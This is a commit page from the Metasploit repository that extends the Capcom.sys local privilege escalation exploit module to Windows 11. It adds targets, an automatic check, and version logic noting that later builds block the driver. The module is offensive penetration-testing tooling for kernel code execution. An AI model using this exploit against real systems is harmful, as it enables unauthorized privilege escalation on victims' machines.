Land #17474, Add Windows 11 support for Capcom LPE

This PR adds support to the Capcom.sys LPE for Windows 11 21H1
rapid7 · Sep 8, 2023 · 96a6baa · 96a6baa
2 parents fee5cc0 + 0111e55
commit 96a6baa
Showing 1 changed file with 11 additions and 2 deletions.
diff --git a/modules/exploits/windows/local/capcom_sys_exec.rb b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
   include Msf::Post::Windows::ReflectiveDLLInjection
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -21,7 +22,8 @@ def initialize(info = {})
             This module abuses the Capcom.sys kernel driver's function that allows for an
             arbitrary function to be executed in the kernel from user land. This function
             purposely disables SMEP prior to invoking a function given by the caller.
-            This has been tested on Windows 7, 8.1 and Windows 10 (x64).
+            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
+            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
           },
           'License' => MSF_LICENSE,
           'Author' => [
@@ -35,7 +37,7 @@ def initialize(info = {})
             'EXITFUNC' => 'thread'
           },
           'Targets' => [
-            [ 'Windows x64 (<= 10)', { 'Arch' => ARCH_X64 } ]
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
           ],
           'Payload' => {
             'Space' => 4096,
@@ -60,11 +62,18 @@ def initialize(info = {})
   end
 
   def check
+    return Exploit::CheckCode::Unknown unless session.platform == 'windows'
+
     version = get_version_info
     if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
       return Exploit::CheckCode::Unknown
     end
 
+    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys
+    if version.build_number > Rex::Version.new('10.0.22000.194')
+      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
+    end
+
     if sysinfo['Architecture'] != ARCH_X64
       return Exploit::CheckCode::Safe
     end